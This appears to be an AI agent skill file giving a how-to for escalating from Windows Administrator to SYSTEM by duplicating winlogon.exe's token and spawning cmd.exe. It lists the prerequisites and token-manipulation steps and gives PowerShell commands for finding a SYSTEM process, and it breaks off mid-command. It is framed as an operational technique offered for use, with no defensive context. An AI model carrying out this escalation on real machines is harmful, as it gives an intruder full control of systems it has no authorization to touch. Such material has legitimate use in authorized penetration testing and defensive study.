windows-seimpersonate-privilege-escalationlisted

# Windows SeImpersonate Privilege Escalation This skill helps you escalate from High Integrity to SYSTEM on Windows using token impersonation via the SeImpersonate technique. ## When to Use This Technique Use this approach when: - You have High Integrity (Administrator) access on Windows - You need SYSTEM-level privileges - You can identify a process running as SYSTEM (like `winlogon.exe`, `wininit.exe`) - You have `SeDebugPrivilege` or can enable it ## Prerequisites 1. **High Integrity Context**: You must be running as an Administrator with High Integrity level 2. **SeDebugPrivilege**: Required to open and manipulate process tokens 3. **Target Process**: A SYSTEM-owned process with appropriate permissions (winlogon.exe is ideal) ## How It Works The technique exploits Windows token manipulation: 1. Enable `SeDebugPrivilege` on your current process 2. Open the target process (e.g., winlogon.exe) with `PROCESS_QUERY_LIMITED_INFORMATION` 3. Open the process's access token with `MAXIMUM_ALLOWED` access 4. Impersonate the logged-on user from that token 5. Duplicate the token to create a primary token 6. Spawn a new process (cmd.exe) using the duplicated SYSTEM token ## Usage ### Step 1: Find a Suitable Target Process Identify a process running as SYSTEM that Administrators can impersonate: ```powershell # Find winlogon.exe PID (usually safe to impersonate) Get-Process winlogon | Select-Object Id, ProcessName # Alternative: Check svchost.exe processes Get-Process svcho